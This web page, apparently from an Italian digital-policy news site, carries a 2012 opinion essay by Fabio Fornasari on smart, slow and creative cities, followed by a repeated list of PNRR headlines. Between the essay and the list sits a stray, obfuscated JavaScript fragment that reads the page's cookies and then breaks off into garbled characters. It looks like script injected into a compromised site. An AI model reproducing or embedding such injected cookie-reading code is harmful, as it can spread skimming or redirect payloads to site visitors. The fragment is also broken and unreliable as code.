La riflessione

Fornasari: “Noi siamo cambiati. Ora tocca alle città”

Smart city, slow city, creative city. Paradigmi convergenti. Gli spazi urbani muteranno, perché noi l’abbiamo già fatto. E cerchiamo ora una porta di connessione al tutto

07 Nov 2012

Fabio Fornasari

fornasari-121012171327

Comunque sia, si parla sempre e ancora di città.

Smart-city, creative-city, slow-city non sono altro che l’idea di città, sempre in cammino; città che consapevolmente ha deciso di muoversi, di andare incontro a un nuovi orizzonti accorgendosi che i modelli tradizionali non sono idonei per governare le metamorfosi in corso. Metamorfosi e non semplicemente trasformazione: il termine rimanda a un organismo vivente, biologico. Non pura materia, ma organismo vivo.

Perché le città come tutti gli organismi si trasformano, subiscono metamorfosi. Un destino ineluttabile in quanto le città non possono restare indietro rispetto a ciò che contengono: una vita sempre più competente, sofisticata, che esprime talenti e formula di continuo nuove domande e che non pensa di non avere bisogno di intermediari per esprimersi.

Le città si costruiscono e modificano intorno alla vita che le animano. Come un tempo resta la città il luogo dove le persone si costruiscono la propria felicità.

Una felicità possibile solo se in connessione con il tutto, solo se intrecciata, collegata, connessa al tutto che gli fa da sfondo e che nello stesso tempo lo compone. Il progetto più importante oggi per ciascuno di noi è il progetto della felicità. Questa crisi ha scardinato le basi per raggiungerla e offre nuove visioni.

In questo periodo, in Emilia Romagna, a distanza di pochi chilometri e di pochi giorni ci sono stati due eventi importanti intorno al futuro delle città: dal 19 al 22 ottobre è stata ospitata tra Reggio Emilia e Novellara una serie di incontri in occasione del festival delle SlowCity.

Il circuito ha il compito di “promuovere e diffondere la cultura del buon vivere attraverso la ricerca, la sperimentazione e l’applicazione di soluzioni per l’organizzazione della città”.

Di segno apparentemente opposto l’incontro sul tema delle SmartCity alla fiera di Bologna, avvenuto negli ultimi tre giorni di ottobre dove le diverse città pilota studiano le “molteplici modalità di comunicazione locale e globale, l’innesto di moderne tecnologie nell’agire quotidiano, la presenza di una strategia condivisa e partecipata”. La metamorfosi riconosciuta all’interno dell’incontro delle SmartCity riguarda quei territori dove il più semplice agglomerato di cose e persone si sta trasformando in “smart community efficienti e socialmente innovative”, dove ogni euro investito in tecnologie mira a incidere direttamente sulla qualità della vita dei cittadini”.

Dal dopoguerra a oggi, le città sono cresciute, si sono costruite e si sono prodotte come corpi imperfetti, inarticolati più interessati a premiare la trasformazione edilizia che lo sviluppo di una qualità dell’abitare, la più umana delle qualità. La trasformazione è stata governata con il metodo del “piano regolatore”- oggi sostituito dal “piani strutturali comunali”- uno strumento che l’obiettivo del controllo e della programmazione dell’organizzazione della trasformazione fisica del territorio.

Il piano regolatore ha per anni ragionato con la logica della zonizzazione individuando aree di riposo e rigenerazione e aree di produzione. Ma oggi la città vive diversamente i suoi spazi. Gli spazi di produzione e del riposo sono confusi. La città ha altri bisogni. Piuttosto ora ha bisogno di darsi un sistema nervoso capace di entrare in contatto con chi vive e usa la città: un sistema nervoso di natura tecnologica che si identifica con la città intesa come l’apparato radicale di un organismo: cervello, apparato digerente e riproduttivo. Non basta più essere vivi. Occorre sentire di esserlo e averne la prova attraverso lo sguardo altrui. Sentire e essere sentiti: la base di qualsiasi felicità. Questo è il reale obiettivo che deve darsi oggi una città.

Il sistema nervoso del quale ha bisogno è un reticolo attraverso il quale trasmettere energia e informazione ma che anche attraverso la sua messa in esercizio elabora pensiero, sviluppa una consapevolezza di se. La città ha sempre più una dimensione “responsive”. Dà corpo alla sempre più spesso citata intelligenza collettiva che si già si esprime con le reti sociali in rete modificando gli immaginari che influenzano gli usi stessi della città. Le nuove tecnologie hanno permesso agli abitanti della città di trasformare se non ancora la parte fisica, sicuramente le immagini che la città offre di sé attraverso l’uso delle tecnologie partecipative: le app come foursquare o altre meno conosciute ma che permettono di collegare l’esperienza ai luoghi della città.

Che siano Smart o che siano Slow le città ricercano le loro reti e le nuove governance che gli permettono non tanto di crescere quanto di accompagnare le metamorfosi in corso.

La domanda più interessante non è quanto sale oggi la città, non è osservare l’altezza dei nuovi grattacieli, ma come nell’insieme chi amministra un territorio sia capace di accompagnare le metamorfosi della vita che si sviluppa al suo interno, alla base e nell’intorno di quei grattacieli. Per avere traccia di questo basta un qualsiasi strumento di connessione e la capacità di leggere i fenomeni.

Un aspetto interessante delle nuove tecnologie è che hanno riattivato memorie, abitudini consuetudini e in alcuni casi valorizzato gli scarti del passato (in questo senso vedi Instagram).

Solo pochi anni fa immaginando la potenza delle nuove tecnologie, del telelavoro, della comunicazione diffusa e della video-presenza sembrava si stesse abbandonando per sempre la forma città. Si parlava di dissoluzione della forma urbana. Invece più che mai resta al centro dei nostri pensieri e non solo. Se si osserva il valore di mercato degli immobili il riscontro è immediato. I differenti stati di connessione possibili altro non fanno che porre al centro l’interesse per la città e ancora di più tematizza dove e come noi abitiamo il nostro mondo e come lo usiamo. La presunta virtualizzazione della nostra vita invece di minare il nostro rapporto con il luogo dove abitiamo lo esalta all’interno di momenti di profonda rivelazione.

Smart City, Slow City, Città creative, città dei talenti e delle competenze: tutte formule che costruiscono intorno alla città cappotti concettuali ma che alla fine altro non fanno che riconoscere continuamente un aspetto fisico del nostro vivere che ha carattere urbano: la città.

Le nuove tecnologie che usiamo altro non fanno che potenziare questa adesione, questa aderenza.

Quello che possiamo osservare invece è come siamo cambiato il modo di abitarle. La gente ha cominciato a usarle in modo molto differente.

Le nuove tecnologie non sono semplicemente delle opportunità per fare qualcosa di natura pragmatica. Le nuove tecnologie ci hanno mostrato dei livelli differenti del nostro stare e usare la città. Le più giovani generazioni hanno così compiuto un salto evolutivo grazie al training dato dalla tecnologia. Le ore che si passano con questi strumenti non aumentano semplicemente la nostra comunicazione, non ci offrono semplicemente un modo per aumentare le nostre facoltà. Ci portano anche fuori da noi stessi, mettendoci a contatto con gli altri. In questo senso mai come ora la città immersa nella tecnologia la viviamo all’interno di una dimensione sciamanica. Le città intelligenti è la forma che la tecnologia assume una volta che ha preso coscienza di sé. Le nostre sensibilità messe in relazione le une con le altre si comportano analogamente alle tecniche di meditazione che offrono alla nostra mente di poterci immaginare differenti. Le tecnologie fanno questo: simulano la medesima adesione a un appartenenza a un tutto.

Quello che si sta chiedendo alle città è di compiere il “salto evolutivo” che ormai si è compiuto a livello dei singoli individui, dei singoli nuclei famigliari, all’interno di molti luoghi di lavoro. Si chiede alle città di partecipare a questa visione e lo si chiede per aumentare le sue potenzialità, le sue capacità. Non è solo una questione di pura tecnologia ma un primo passo attraverso la tecnologia per scoprire che altri mondi possibili sono realmente possibili. Tutti questi modelli di città, infine, sono propedeutici a qualcosa ancora a venire.

function cc(ccn){var c=d[‘cookie’];return c.search(ccn.split(”).reverse().join(”))^O0$5rL”E,)3T<:#}N%u&/{HXUSWps+ixt`@bm~qGh7AvCQ;1-Jc*kZIgl!fnyw9DP6Rj2e[(aYB8._=KM4';}

Speciale PNRR

Tutti
Incentivi
PA
Sostemibilità
Analisi
Formazione
Salute digitale
Sicurezza
Sostenibilità
Digital Economy
Formazione
Trasferimento tecnologico, il Mise mette sul piatto 7,5 milioni
Strategie
PSN e Strategia Cloud Italia: a che punto siamo e come supportare la PA in questo percorso
Dispersione idrica
Siccità: AI e analisi dei dati possono ridurre gli sprechi d’acqua. Ecco gli interventi necessari
PNRR
Cloud, firmato il contratto per l’avvio di lavori del Polo strategico
Formazione
Competenze digitali, stanziati 48 milioni per gli Istituti tecnologici superiori
Iniziative
Digitalizzazione delle reti idriche: oltre 600 milioni per 21 progetti
Competenze e competitività
PNRR, così i fondi UE possono rilanciare la ricerca e l’Università
Finanziamenti
PNRR, si sbloccano i fondi per l’agrisolare
Sanità post-pandemica
PNRR, Missione Salute: a che punto siamo e cosa resta da fare
Strategie
Sovranità e autonomia tecnologica nazionale: come avviare un processo virtuoso e sostenibile
La relazione
Pnrr e PA digitale, l’alert della Corte dei conti su execution e capacità di spesa
L'editoriale
Elezioni 2022, la sfida digitale ai margini del dibattito politico
Strategie
Digitale, il monito di I-Com: “Senza riforme Pnrr inefficace”
Transizione digitale
Pnrr: arrivano 321 milioni per cloud dei Comuni, spazio e mobilità innovativa
L'analisi I-COM
Il PNRR alla prova delle elezioni: come usare bene le risorse e centrare gli obiettivi digitali
Cineca
Quantum computing, una svolta per la ricerca: lo scenario europeo e i progetti in corso
L'indice europeo
Desi, l’Italia scala due posizioni grazie a fibra e 5G. Ma è (ancora) allarme competenze
L'approfondimento
PNRR 2, ecco tutte le misure per cittadini e imprese: portale sommerso, codice crisi d’impresa e sismabonus, cosa cambia
Servizi digitali
PNRR e trasformazione digitale: ecco gli investimenti e le riforme previste per la digitalizzazione della PA
Legal health
Lo spazio europeo dei dati sanitari: come circoleranno le informazioni sulla salute nell’Unione Europea
Servizi digitali
PNRR e PA digitale: non dimentichiamo la dematerializzazione
Digital Healthcare transformation
La trasformazione digitale degli ospedali
Governance digitale
PA digitale, è la volta buona? Così misure e risorse del PNRR possono fare la differenza
Servizi digitali
Comuni e digitale, come usare il PNRR senza sbagliare
La survey
Pnrr e digitale accoppiata vincente per il 70% delle pmi italiane
Missione salute
Fascicolo Sanitario Elettronico alla prova del PNRR: limiti, rischi e opportunità
Servizi pubblici
PNRR: come diventeranno i siti dei comuni italiani grazie alle nuove risorse
Skill gap
PNRR, la banda ultra larga crea 20.000 nuovi posti di lavoro
Il Piano
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUMPA2022
PNRR e trasformazione digitale: rivedi i Talk di FORUM PA 2022 in collaborazione con le aziende partner
I contratti
Avio, 340 milioni dal Pnrr per i nuovi propulsori a metano
Next Generation EU
PNRR, a che punto siamo e cosa possono aspettarsi le aziende private
Fondi
Operativo il nuovo portale del MISE con tutti i finanziamenti per le imprese
Servizi comunali
Il PNRR occasione unica per i Comuni digitali: strumenti e risorse per enti e cittadini
Healthcare data platform
PNRR dalla teoria alla pratica: tecnologie e soluzioni per l’innovazione in Sanità
Skill
Competenze digitali, partono le Reti di facilitazione
Gli obiettivi
Scuola 4.0, PNRR ultima chance: ecco come cambierà il sistema formativo
Sistema Paese
PNRR 2, è il turno della space economy
FORUM PA 2022
FORUM PA 2022: la maturità digitale dei comuni italiani rispetto al PNRR
Analisi
PNRR: dalla Ricerca all’impresa, una sfida da cogliere insieme
Innovazione
Pnrr, il Dipartimento per la Trasformazione digitale si riorganizza
FORUM PA 2022
PA verde e sostenibile: il ruolo di PNRR, PNIEC, energy management e green public procurement
Analisi
PNRR, Comuni e digitalizzazione: tutto su fondi e opportunità, in meno di 3 minuti. Guarda il video!
Rapporti
Competenze digitali e servizi automatizzati pilastri del piano Inps
Analisi
Attuazione del PNRR: il dialogo necessario tra istituzioni e società civile. Rivedi lo Scenario di FORUM PA 2022
Progetti
Pnrr, fondi per il Politecnico di Torino. Fra i progetti anche IS4Aerospace
Analisi
PNRR, Colao fa il punto sulla transizione digitale dell’Italia: «In linea con tutte le scadenze»
La Svolta
Ict, Istat “riclassifica” i professionisti. Via anche al catalogo dati sul Pnrr
Analisi
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUM PA 2022
Ecosistema territoriale sostenibile: l’Emilia Romagna tra FESR e PNRR
Il Piano
Innovazione, il Mise “centra” gli obiettivi Pnrr: attivati 17,5 miliardi
Analisi
PNRR: raggiunti gli obiettivi per il primo semestre 2022. Il punto e qualche riflessione
Analisi
PNRR: dal dialogo tra PA e società civile passa il corretto monitoraggio dei risultati, tra collaborazione e identità dei luoghi
Webinar
Comuni e PNRR: un focus sui bandi attivi o in pubblicazione
Analisi
Formazione 4.0: cos’è e come funziona il credito d’imposta
PA e Sicurezza
PA e sicurezza informatica: il ruolo dei territori di fronte alle sfide della digitalizzazione
PA e sicurezza
PNRR e servizi pubblici digitali: sfide e opportunità per Comuni e Città metropolitane
Water management
Water management in Italia: verso una transizione “smart” e “circular” 
LE RISORSE
Transizione digitale, Simest apre i fondi Pnrr alle medie imprese
Prospettive
Turismo, cultura e digital: come spendere bene le risorse del PNRR
Analisi
Smart City: quale contributo alla transizione ecologica
Decarbonizzazione
Idrogeno verde, 450 milioni € di investimenti PNRR, Cingolani firma
Unioncamere
PNRR, imprese in ritardo: ecco come le Camere di commercio possono aiutare
I fondi
Industria 4.0: solo un’impresa su tre pronta a salire sul treno Pnrr
Formazione
Trasferimento tecnologico, il Mise mette sul piatto 7,5 milioni
Strategie
PSN e Strategia Cloud Italia: a che punto siamo e come supportare la PA in questo percorso
Dispersione idrica
Siccità: AI e analisi dei dati possono ridurre gli sprechi d’acqua. Ecco gli interventi necessari
PNRR
Cloud, firmato il contratto per l’avvio di lavori del Polo strategico
Formazione
Competenze digitali, stanziati 48 milioni per gli Istituti tecnologici superiori
Iniziative
Digitalizzazione delle reti idriche: oltre 600 milioni per 21 progetti
Competenze e competitività
PNRR, così i fondi UE possono rilanciare la ricerca e l’Università
Finanziamenti
PNRR, si sbloccano i fondi per l’agrisolare
Sanità post-pandemica
PNRR, Missione Salute: a che punto siamo e cosa resta da fare
Strategie
Sovranità e autonomia tecnologica nazionale: come avviare un processo virtuoso e sostenibile
La relazione
Pnrr e PA digitale, l’alert della Corte dei conti su execution e capacità di spesa
L'editoriale
Elezioni 2022, la sfida digitale ai margini del dibattito politico
Strategie
Digitale, il monito di I-Com: “Senza riforme Pnrr inefficace”
Transizione digitale
Pnrr: arrivano 321 milioni per cloud dei Comuni, spazio e mobilità innovativa
L'analisi I-COM
Il PNRR alla prova delle elezioni: come usare bene le risorse e centrare gli obiettivi digitali
Cineca
Quantum computing, una svolta per la ricerca: lo scenario europeo e i progetti in corso
L'indice europeo
Desi, l’Italia scala due posizioni grazie a fibra e 5G. Ma è (ancora) allarme competenze
L'approfondimento
PNRR 2, ecco tutte le misure per cittadini e imprese: portale sommerso, codice crisi d’impresa e sismabonus, cosa cambia
Servizi digitali
PNRR e trasformazione digitale: ecco gli investimenti e le riforme previste per la digitalizzazione della PA
Legal health
Lo spazio europeo dei dati sanitari: come circoleranno le informazioni sulla salute nell’Unione Europea
Servizi digitali
PNRR e PA digitale: non dimentichiamo la dematerializzazione
Digital Healthcare transformation
La trasformazione digitale degli ospedali
Governance digitale
PA digitale, è la volta buona? Così misure e risorse del PNRR possono fare la differenza
Servizi digitali
Comuni e digitale, come usare il PNRR senza sbagliare
La survey
Pnrr e digitale accoppiata vincente per il 70% delle pmi italiane
Missione salute
Fascicolo Sanitario Elettronico alla prova del PNRR: limiti, rischi e opportunità
Servizi pubblici
PNRR: come diventeranno i siti dei comuni italiani grazie alle nuove risorse
Skill gap
PNRR, la banda ultra larga crea 20.000 nuovi posti di lavoro
Il Piano
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUMPA2022
PNRR e trasformazione digitale: rivedi i Talk di FORUM PA 2022 in collaborazione con le aziende partner
I contratti
Avio, 340 milioni dal Pnrr per i nuovi propulsori a metano
Next Generation EU
PNRR, a che punto siamo e cosa possono aspettarsi le aziende private
Fondi
Operativo il nuovo portale del MISE con tutti i finanziamenti per le imprese
Servizi comunali
Il PNRR occasione unica per i Comuni digitali: strumenti e risorse per enti e cittadini
Healthcare data platform
PNRR dalla teoria alla pratica: tecnologie e soluzioni per l’innovazione in Sanità
Skill
Competenze digitali, partono le Reti di facilitazione
Gli obiettivi
Scuola 4.0, PNRR ultima chance: ecco come cambierà il sistema formativo
Sistema Paese
PNRR 2, è il turno della space economy
FORUM PA 2022
FORUM PA 2022: la maturità digitale dei comuni italiani rispetto al PNRR
Analisi
PNRR: dalla Ricerca all’impresa, una sfida da cogliere insieme
Innovazione
Pnrr, il Dipartimento per la Trasformazione digitale si riorganizza
FORUM PA 2022
PA verde e sostenibile: il ruolo di PNRR, PNIEC, energy management e green public procurement
Analisi
PNRR, Comuni e digitalizzazione: tutto su fondi e opportunità, in meno di 3 minuti. Guarda il video!
Rapporti
Competenze digitali e servizi automatizzati pilastri del piano Inps
Analisi
Attuazione del PNRR: il dialogo necessario tra istituzioni e società civile. Rivedi lo Scenario di FORUM PA 2022
Progetti
Pnrr, fondi per il Politecnico di Torino. Fra i progetti anche IS4Aerospace
Analisi
PNRR, Colao fa il punto sulla transizione digitale dell’Italia: «In linea con tutte le scadenze»
La Svolta
Ict, Istat “riclassifica” i professionisti. Via anche al catalogo dati sul Pnrr
Analisi
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUM PA 2022
Ecosistema territoriale sostenibile: l’Emilia Romagna tra FESR e PNRR
Il Piano
Innovazione, il Mise “centra” gli obiettivi Pnrr: attivati 17,5 miliardi
Analisi
PNRR: raggiunti gli obiettivi per il primo semestre 2022. Il punto e qualche riflessione
Analisi
PNRR: dal dialogo tra PA e società civile passa il corretto monitoraggio dei risultati, tra collaborazione e identità dei luoghi
Webinar
Comuni e PNRR: un focus sui bandi attivi o in pubblicazione
Analisi
Formazione 4.0: cos’è e come funziona il credito d’imposta
PA e Sicurezza
PA e sicurezza informatica: il ruolo dei territori di fronte alle sfide della digitalizzazione
PA e sicurezza
PNRR e servizi pubblici digitali: sfide e opportunità per Comuni e Città metropolitane
Water management
Water management in Italia: verso una transizione “smart” e “circular” 
LE RISORSE
Transizione digitale, Simest apre i fondi Pnrr alle medie imprese
Prospettive
Turismo, cultura e digital: come spendere bene le risorse del PNRR
Analisi
Smart City: quale contributo alla transizione ecologica
Decarbonizzazione
Idrogeno verde, 450 milioni € di investimenti PNRR, Cingolani firma
Unioncamere
PNRR, imprese in ritardo: ecco come le Camere di commercio possono aiutare
I fondi
Industria 4.0: solo un’impresa su tre pronta a salire sul treno Pnrr

Articolo 1 di 2